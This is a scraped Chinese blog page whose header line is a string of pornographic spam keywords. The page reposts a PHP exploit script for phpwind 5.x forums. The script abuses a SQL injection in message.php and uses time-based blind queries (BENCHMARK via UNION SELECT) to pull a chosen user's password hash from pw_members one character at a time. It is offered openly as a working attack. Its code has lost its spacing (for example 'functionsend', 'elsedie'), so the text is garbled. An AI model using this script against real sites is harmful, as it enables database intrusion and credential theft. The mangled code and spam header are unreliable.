日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

phpwindexp.php,phpwind Exp 漏洞利用

發布時間:2024/7/19 php 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 phpwindexp.php,phpwind Exp 漏洞利用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

phpwind Exp 漏洞利用

2021-01-23 12:07:25644

忘記什么時候我就拿到了,一直沒發揮.由于某些原因一直沒發出來,畢竟不是原創,現在有人帖出來了,我也放出來.

程序代碼

print_r("

+------------------------------------------------------------------+

ExploitForPhpwind5.XVersion

BYLoveshell

JustForFun:)

+------------------------------------------------------------------+

");

ini_set("max_execution_time",0);

error_reporting(7);

$bbspath="$argv[2]";

$server="$argv[1]";

$cookie='1ae40_lastfid=0;1ae40_ol_offset=776;1ae40_ck_info=%2F%09.72m.net;1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;

$useragent="Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1)";

$uid=intval($argv[3])>0?intval($argv[3]):1;

echo"\r\n#Logging\t........";

if(islogin())echo"LoginOk!\r\n";

elsedie("NotLogin!\tCheckYourCookieandUseragent!\r\n");

echo"#Testing\t........";

if(test())echo"Vul!\r\n";

elsedie("NotVul");

$hashtable='0123456789abcdef';

$count=0;

echo"#Cracking\t\r\n\r\n";

for($i=1;$i<=16;$i++){

echo"第\t$i\t位:";

$subpass=crack($i+8);

$password=$password.$subpass;

echo"$subpass\r\n";

}

echo"Password:\t$password";

echo"\r\nGoodLuck$countTimes\r\n";

functionsend($cmd,$path)

{

global$bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$bbspath."$path";

$message="POST".$path."HTTP/1.1\r\n";

$message.="Accept:*/*\r\n";

$message.="Accept-Language:zh-cn\r\n";

$message.="Referer:http://".$server.$path."\r\n";

$message.="Content-Type:application/x-www-form-urlencoded\r\n";

$message.="User-Agent:".$useragent."\r\n";

$message.="Host:".$server."\r\n";

$message.="Content-length:".strlen($cmd)."\r\n";

$message.="Connection:Keep-Alive\r\n";

$message.="Cookie:".$cookie."\r\n";

$message.="\r\n";

$message.=$cmd."\r\n";

$count=$count+1;

$fd=fsockopen($server,80);

fputs($fd,$message);

$resp="

";

while($fd&&!feof($fd)){

$resp.=fread($fd,1024);

}

fclose($fd);

$resp.="

";

if($debug){echo$cmd;echo$resp;}

//echo$resp;

return$resp;

}

functionsqlject($sql){

global$uid;

$data='action=pubmsg&readmsg=0)';

$data=$data."unionselectBENCHMARK(1000000,md5(12345))frompw_memberswhereuid=$uidand$sql".'/*';

$echo=send($data,'message.php');

preg_match("/Total(.*)\(/i",$echo,$matches);

if($matches[1]>2)return1;

elsereturn0;

}

functiontest(){

global$uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'MySQLServerError'))return1;

elsereturn0;

}

functionislogin(){

global$uid;

$data='action=pubmsg&readmsg=0)';

$echo=send($data,'message.php');

if(strpos($echo,'login.php"'))return0;

elsereturn1;

}

functioncrack($i){

global$hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');

if(sqlject($sql)){

$a=8;

$b=15;}

else{

$a=0;

$b=8;

}

for($tmp=$a;$tmp<=$b;$tmp++){

$sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);

if(sqlject($sql))return$hashtable[$tmp];

}

crack($i);

}

?>

點擊下載此文件

點擊這里復制本文地址

以上內容由聚米學院網友整理呈現,如對侵犯您的權益,請聯系郵箱:fzsbm@qq.com

總結

以上是生活随笔為你收集整理的phpwindexp.php,phpwind Exp 漏洞利用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。